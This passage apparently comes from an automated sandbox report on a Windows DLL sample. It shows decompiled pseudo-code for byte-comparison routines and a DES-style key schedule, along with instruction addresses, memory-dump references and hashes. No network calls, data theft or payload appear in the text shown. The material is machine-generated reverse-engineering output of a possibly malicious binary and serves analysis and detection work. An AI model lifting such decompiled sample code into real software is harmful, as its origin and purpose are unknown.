											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                                                                                      0x1000c063
                                                                                                                                                      0x1000c063
                                                                                                                                                      0x1000c069
                                                                                                                                                      0x1000c0e8
                                                                                                                                                      0x1000c0ea
                                                                                                                                                      0x1000c0ec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0f2
                                                                                                                                                      0x1000c0f8
                                                                                                                                                      0x1000c177
                                                                                                                                                      0x1000c179
                                                                                                                                                      0x1000c17b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c181
                                                                                                                                                      0x1000c187
                                                                                                                                                      0x1000c206
                                                                                                                                                      0x1000c208
                                                                                                                                                      0x1000c20a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c210
                                                                                                                                                      0x1000c216
                                                                                                                                                      0x1000c295
                                                                                                                                                      0x1000c297
                                                                                                                                                      0x1000c299
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c29f
                                                                                                                                                      0x1000c2a5
                                                                                                                                                      0x1000c324
                                                                                                                                                      0x1000c326
                                                                                                                                                      0x1000c328
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c334
                                                                                                                                                      0x1000c3b4
                                                                                                                                                      0x1000c3b6
                                                                                                                                                      0x1000c3b8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c3be
                                                                                                                                                      0x1000c3c4
                                                                                                                                                      0x1000c443
                                                                                                                                                      0x1000c445
                                                                                                                                                      0x1000c447
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c455
                                                                                                                                                      0x1000bc4f
                                                                                                                                                      0x1000bc51
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c9ad
                                                                                                                                                      0x1000c463
                                                                                                                                                      0x1000c465
                                                                                                                                                      0x1000c041
                                                                                                                                                      0x1000c049
                                                                                                                                                      0x1000c04b
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x1000c05c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c04b
                                                                                                                                                      0x1000c472
                                                                                                                                                      0x1000c478
                                                                                                                                                      0x1000c891
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c891
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c47e
                                                                                                                                                      0x1000c3cd
                                                                                                                                                      0x1000c3cf
                                                                                                                                                      0x1000c3e6
                                                                                                                                                      0x1000c3ee
                                                                                                                                                      0x1000c3f0
                                                                                                                                                      0x1000c407
                                                                                                                                                      0x1000c40f
                                                                                                                                                      0x1000c411
                                                                                                                                                      0x1000c428
                                                                                                                                                      0x1000c430
                                                                                                                                                      0x1000c432
                                                                                                                                                      0x1000c43f
                                                                                                                                                      0x1000c43f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c432
                                                                                                                                                      0x1000c41e
                                                                                                                                                      0x1000c422
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c422
                                                                                                                                                      0x1000c3fd
                                                                                                                                                      0x1000c401
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c401
                                                                                                                                                      0x1000c3dc
                                                                                                                                                      0x1000c3e0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c3e0
                                                                                                                                                      0x1000c33e
                                                                                                                                                      0x1000c340
                                                                                                                                                      0x1000c357
                                                                                                                                                      0x1000c35f
                                                                                                                                                      0x1000c361
                                                                                                                                                      0x1000c378
                                                                                                                                                      0x1000c380
                                                                                                                                                      0x1000c382
                                                                                                                                                      0x1000c399
                                                                                                                                                      0x1000c3a1
                                                                                                                                                      0x1000c3a3
                                                                                                                                                      0x1000c3b0
                                                                                                                                                      0x1000c3b0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c3a3
                                                                                                                                                      0x1000c38f
                                                                                                                                                      0x1000c393
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c393
                                                                                                                                                      0x1000c36e
                                                                                                                                                      0x1000c372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c372
                                                                                                                                                      0x1000c34d
                                                                                                                                                      0x1000c351
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c351
                                                                                                                                                      0x1000c2ae
                                                                                                                                                      0x1000c2b0
                                                                                                                                                      0x1000c2c7
                                                                                                                                                      0x1000c2cf
                                                                                                                                                      0x1000c2d1
                                                                                                                                                      0x1000c2e8
                                                                                                                                                      0x1000c2f0
                                                                                                                                                      0x1000c2f2
                                                                                                                                                      0x1000c309
                                                                                                                                                      0x1000c311
                                                                                                                                                      0x1000c313
                                                                                                                                                      0x1000c320
                                                                                                                                                      0x1000c320
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c313
                                                                                                                                                      0x1000c2ff
                                                                                                                                                      0x1000c303
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c303
                                                                                                                                                      0x1000c2de
                                                                                                                                                      0x1000c2e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c2e2
                                                                                                                                                      0x1000c2bd
                                                                                                                                                      0x1000c2c1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c2c1
                                                                                                                                                      0x1000c21f
                                                                                                                                                      0x1000c221
                                                                                                                                                      0x1000c238
                                                                                                                                                      0x1000c240
                                                                                                                                                      0x1000c242
                                                                                                                                                      0x1000c259
                                                                                                                                                      0x1000c261
                                                                                                                                                      0x1000c263
                                                                                                                                                      0x1000c27a
                                                                                                                                                      0x1000c282
                                                                                                                                                      0x1000c284
                                                                                                                                                      0x1000c291
                                                                                                                                                      0x1000c291
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c284
                                                                                                                                                      0x1000c270
                                                                                                                                                      0x1000c274
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c274
                                                                                                                                                      0x1000c24f
                                                                                                                                                      0x1000c253
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c253
                                                                                                                                                      0x1000c22e
                                                                                                                                                      0x1000c232
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c232
                                                                                                                                                      0x1000c190
                                                                                                                                                      0x1000c192
                                                                                                                                                      0x1000c1a9
                                                                                                                                                      0x1000c1b1
                                                                                                                                                      0x1000c1b3
                                                                                                                                                      0x1000c1ca
                                                                                                                                                      0x1000c1d2
                                                                                                                                                      0x1000c1d4
                                                                                                                                                      0x1000c1eb
                                                                                                                                                      0x1000c1f3
                                                                                                                                                      0x1000c1f5
                                                                                                                                                      0x1000c202
                                                                                                                                                      0x1000c202
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1f5
                                                                                                                                                      0x1000c1e1
                                                                                                                                                      0x1000c1e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1e5
                                                                                                                                                      0x1000c1c0
                                                                                                                                                      0x1000c1c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1c4
                                                                                                                                                      0x1000c19f
                                                                                                                                                      0x1000c1a3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c1a3
                                                                                                                                                      0x1000c101
                                                                                                                                                      0x1000c103
                                                                                                                                                      0x1000c11a
                                                                                                                                                      0x1000c122
                                                                                                                                                      0x1000c124
                                                                                                                                                      0x1000c13b
                                                                                                                                                      0x1000c143
                                                                                                                                                      0x1000c145
                                                                                                                                                      0x1000c15c
                                                                                                                                                      0x1000c164
                                                                                                                                                      0x1000c166
                                                                                                                                                      0x1000c173
                                                                                                                                                      0x1000c173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c166
                                                                                                                                                      0x1000c152
                                                                                                                                                      0x1000c156
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c156
                                                                                                                                                      0x1000c131
                                                                                                                                                      0x1000c135
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c135
                                                                                                                                                      0x1000c110
                                                                                                                                                      0x1000c114
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c06b
                                                                                                                                                      0x1000c06b
                                                                                                                                                      0x1000c06e
                                                                                                                                                      0x1000c072
                                                                                                                                                      0x1000c074
                                                                                                                                                      0x1000c08b
                                                                                                                                                      0x1000c08b
                                                                                                                                                      0x1000c08f
                                                                                                                                                      0x1000c093
                                                                                                                                                      0x1000c095
                                                                                                                                                      0x1000c0ac
                                                                                                                                                      0x1000c0ac
                                                                                                                                                      0x1000c0b0
                                                                                                                                                      0x1000c0b4
                                                                                                                                                      0x1000c0b6
                                                                                                                                                      0x1000c0cd
                                                                                                                                                      0x1000c0cd
                                                                                                                                                      0x1000c0d1
                                                                                                                                                      0x1000c0d5
                                                                                                                                                      0x1000c0d7
                                                                                                                                                      0x1000c0dd
                                                                                                                                                      0x1000c0e0
                                                                                                                                                      0x1000c0e4
                                                                                                                                                      0x1000c0e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0d7
                                                                                                                                                      0x1000c0bc
                                                                                                                                                      0x1000c0bf
                                                                                                                                                      0x1000c0c3
                                                                                                                                                      0x1000c0c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0c7
                                                                                                                                                      0x1000c09b
                                                                                                                                                      0x1000c09e
                                                                                                                                                      0x1000c0a2
                                                                                                                                                      0x1000c0a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c0a6
                                                                                                                                                      0x1000c07a
                                                                                                                                                      0x1000c07d
                                                                                                                                                      0x1000c081
                                                                                                                                                      0x1000c085
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c085
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x1000b87c
                                                                                                                                                      0x00000000

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                      • Instruction ID: 9bf27d4f473e059b9c25e54237eb93213d4a45c65592e091a996cd15196d3fb2
                                                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                      • Instruction Fuzzy Hash: C0D14073C1EAF3469375C62D405862EEAA2EFC16D432BC3E1DCD42F29DDA269D0496D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001EBD0, Relevance: .4, Instructions: 377COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001EBD0(signed int* _a4, signed char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t191;

				_t3 =  &(_a8[1]); // 0x86a08c4
				_t5 =  &(_a8[2]); // 0x8d086a08
				_t7 =  &(_a8[3]); // 0x858d086a
				_v20 = ( *_a8 & 0x000000ff) << 0x00000018 | ( *_t3 & 0x000000ff) << 0x00000010 | ( *_t5 & 0x000000ff) << 0x00000008 |  *_t7 & 0x000000ff;
				_t10 =  &(_a8[4]); // 0xd0858d08
				_t12 =  &(_a8[5]); // 0xfed0858d
				_t14 =  &(_a8[6]); // 0xfffed085
				_t16 =  &(_a8[7]); // 0xfffffed0
				_v16 = ( *_t10 & 0x000000ff) << 0x00000018 | ( *_t12 & 0x000000ff) << 0x00000010 | ( *_t14 & 0x000000ff) << 0x00000008 |  *_t16 & 0x000000ff;
				_v8 = (_v16 >> 0x00000004 ^ _v20) & 0x0f0f0f0f;
				_v20 = _v20 ^ _v8;
				_v16 = _v8 << 0x00000004 ^ _v16;
				_v8 = (_v16 ^ _v20) & 0x10101010;
				_v20 = _v20 ^ _v8;
				_v16 = _v16 ^ _v8;
				_v20 =  *(0x10025cf8 + (_v20 & 0x0000000f) * 4) << 0x00000003 |  *(0x10025cf8 + (_v20 >> 0x00000008 & 0x0000000f) * 4) << 0x00000002 |  *(0x10025cf8 + (_v20 >> 0x00000010 & 0x0000000f) * 4) << 0x00000001 |  *(0x10025cf8 + (_v20 >> 0x00000018 & 0x0000000f) * 4) |  *(0x10025cf8 + (_v20 >> 0x00000005 & 0x0000000f) * 4) << 0x00000007 |  *(0x10025cf8 + (_v20 >> 0x0000000d & 0x0000000f) * 4) << 0x00000006 |  *(0x10025cf8 + (_v20 >> 0x00000015 & 0x0000000f) * 4) << 0x00000005 |  *(0x10025cf8 + (_v20 >> 0x0000001d & 0x0000000f) * 4) << 0x00000004;
				_v16 =  *(0x10025d38 + (_v16 >> 0x00000001 & 0x0000000f) * 4) << 0x00000003 |  *(0x10025d38 + (_v16 >> 0x00000009 & 0x0000000f) * 4) << 0x00000002 |  *(0x10025d38 + (_v16 >> 0x00000011 & 0x0000000f) * 4) << 0x00000001 |  *(0x10025d38 + (_v16 >> 0x00000019 & 0x0000000f) * 4) |  *(0x10025d38 + (_v16 >> 0x00000004 & 0x0000000f) * 4) << 0x00000007 |  *(0x10025d38 + (_v16 >> 0x0000000c & 0x0000000f) * 4) << 0x00000006 |  *(0x10025d38 + (_v16 >> 0x00000014 & 0x0000000f) * 4) << 0x00000005 |  *(0x10025d38 + (_v16 >> 0x0000001c & 0x0000000f) * 4) << 0x00000004;
				_v20 = _v20 & 0x0fffffff;
				_t191 = _v16 & 0x0fffffff;
				_v16 = _t191;
				_v12 = 0;
				while(_v12 < 0x10) {
					if(_v12 < 2 || _v12 == 8 || _v12 == 0xf) {
						_v20 = (_v20 << 0x00000001 | _v20 >> 0x0000001b) & 0x0fffffff;
						_v16 = (_v16 << 0x00000001 | _v16 >> 0x0000001b) & 0x0fffffff;
					} else {
						_v20 = (_v20 << 0x00000002 | _v20 >> 0x0000001a) & 0x0fffffff;
						_v16 = (_v16 << 0x00000002 | _v16 >> 0x0000001a) & 0x0fffffff;
					}
					 *_a4 = _v20 << 0x00000004 & 0x24000000 | _v20 << 0x0000001c & 0x10000000 | _v20 << 0x0000000e & 0x08000000 | _v20 << 0x00000012 & 0x02080000 | _v20 << 0x00000006 & 0x01000000 | _v20 << 0x00000009 & 0x00200000 | _v20 >> 0x00000001 & 0x00100000 | _v20 << 0x0000000a & 0x00040000 | _v20 << 0x00000002 & 0x00020000 | _v20 >> 0x0000000a & 0x00010000 | _v16 >> 0x0000000d & 0x00002000 | _v16 >> 0x00000004 & 0x00001000 | _v16 << 0x00000006 & 0x00000800 | _v16 >> 0x00000001 & 0x00000400 | _v16 >> 0x0000000e & 0x00000200 | _v16 & 0x00000100 | _v16 >> 0x00000005 & 0x00000020 | _v16 >> 0x0000000a & 0x00000010 | _v16 >> 0x00000003 & 0x00000008 | _v16 >> 0x00000012 & 0x00000004 | _v16 >> 0x0000001a & 0x00000002 | _v16 >> 0x00000018 & 0x00000001;
					_a4 =  &(_a4[1]);
					_t191 = _v16 >> 0x00000015 & 0x00000002;
					 *_a4 = _v20 << 0x0000000f & 0x20000000 | _v20 << 0x00000011 & 0x10000000 | _v20 << 0x0000000a & 0x08000000 | _v20 << 0x00000016 & 0x04000000 | _v20 >> 0x00000002 & 0x02000000 | _v20 << 0x00000001 & 0x01000000 | _v20 << 0x00000010 & 0x00200000 | _v20 << 0x0000000b & 0x00100000 | _v20 << 0x00000003 & 0x00080000 | _v20 >> 0x00000006 & 0x00040000 | _v20 << 0x0000000f & 0x00020000 | _v20 >> 0x00000004 & 0x00010000 | _v16 >> 0x00000002 & 0x00002000 | _v16 << 0x00000008 & 0x00001000 | _v16 >> 0x0000000e & 0x00000808 | _v16 >> 0x00000009 & 0x00000400 | _v16 & 0x00000200 | _v16 << 0x00000007 & 0x00000100 | _v16 >> 0x00000007 & 0x00000020 | _v16 >> 0x00000003 & 0x00000011 | _v16 << 0x00000002 & 0x00000004 | _t191;
					_a4 =  &(_a4[1]);
					_v12 = _v12 + 1;
				}
				return _t191;
			}








                                                                                                                                                      0x1001ebe2
                                                                                                                                                      0x1001ebee
                                                                                                                                                      0x1001ebfa
                                                                                                                                                      0x1001ec00
                                                                                                                                                      0x1001ec06
                                                                                                                                                      0x1001ec10
                                                                                                                                                      0x1001ec1c
                                                                                                                                                      0x1001ec28
                                                                                                                                                      0x1001ec2e
                                                                                                                                                      0x1001ec40
                                                                                                                                                      0x1001ec49
                                                                                                                                                      0x1001ec55
                                                                                                                                                      0x1001ec64
                                                                                                                                                      0x1001ec6d
                                                                                                                                                      0x1001ec76
                                                                                                                                                      0x1001ed16
                                                                                                                                                      0x1001edb8
                                                                                                                                                      0x1001edc4
                                                                                                                                                      0x1001edca
                                                                                                                                                      0x1001edcf
                                                                                                                                                      0x1001edd2
                                                                                                                                                      0x1001ede4
                                                                                                                                                      0x1001edf2
                                                                                                                                                      0x1001ee13
                                                                                                                                                      0x1001ee29
                                                                                                                                                      0x1001ee2e
                                                                                                                                                      0x1001ee41
                                                                                                                                                      0x1001ee58
                                                                                                                                                      0x1001ee58
                                                                                                                                                      0x1001ef72
                                                                                                                                                      0x1001ef7a
                                                                                                                                                      0x1001f091
                                                                                                                                                      0x1001f099
                                                                                                                                                      0x1001f0a1
                                                                                                                                                      0x1001ede1
                                                                                                                                                      0x1001ede1
                                                                                                                                                      0x1001f0ac

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 26d347caaebb4134736e1291c681f223ae3d06987f61639b05510bbde1db3ee8
                                                                                                                                                      • Instruction ID: f211c0cef621b5a291f88d0ae3a0398c0a586129dbe3d68e9b04f87971d5a04b
                                                                                                                                                      • Opcode Fuzzy Hash: 26d347caaebb4134736e1291c681f223ae3d06987f61639b05510bbde1db3ee8
                                                                                                                                                      • Instruction Fuzzy Hash: 71E13F71E104589BEB58CA5DC8957ADB7F3FB84340F24C669E13AE7289C674E606CB40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000BC57, Relevance: .4, Instructions: 361COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000BC57(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
